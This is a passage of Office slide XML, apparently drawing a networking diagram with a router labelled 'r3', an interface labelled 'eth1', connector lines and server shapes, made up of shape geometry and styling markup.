              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9224" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256042A3-DDE6-AB00-4E3B-D75B17C9A59C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4024669" y="6030411"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9225" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E01395D-F053-DDD3-6BAD-22C5A0303667}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9226" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21EAFAD0-A1CC-3171-9EDB-B8B88DD4F428}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Connettore diritto 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D459B28-2328-7F4A-61E8-4CDB2F17FF51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9308" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5366875" y="6141062"/>
            <a:ext cx="4350116" cy="18445"/>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0" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F53608-767F-485F-C868-C580B85E0554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9562193" y="2923524"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9227" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4169EAA9-D465-6B67-FAA6-092160F5D3C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9229" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9B3F7F-4354-705F-71F4-6F144798CC2D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819F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3025" tIns="36512" rIns="73025" bIns="36512"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it-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9230" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F899B03-F97E-441F-E7DE-58BAED0E84C3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9231" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9972E79D-2BC6-0C73-7BAC-CF57933624E8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9232" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBEAC5A2-4D09-A482-2D07-202657AC3840}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 13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93" h="132">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9233" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DFC9643-4A35-02D6-7A9D-8EF791E65C9E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28 h 12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92" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9234" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10068653-C32A-D07A-A8A6-9388CCA91DC8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="124">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9228" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E456DB83-C605-C400-DB72-D372158E0B43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9237" name="Gruppo 9236">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41AF1BA-9849-E331-5040-062C0C2A4844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5916482" y="3692248"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9239" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3DE1063-D097-86DF-0335-A5EAE5B0E451}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9240" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123D024A-24AD-AC9F-6BA9-A5214418D9DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
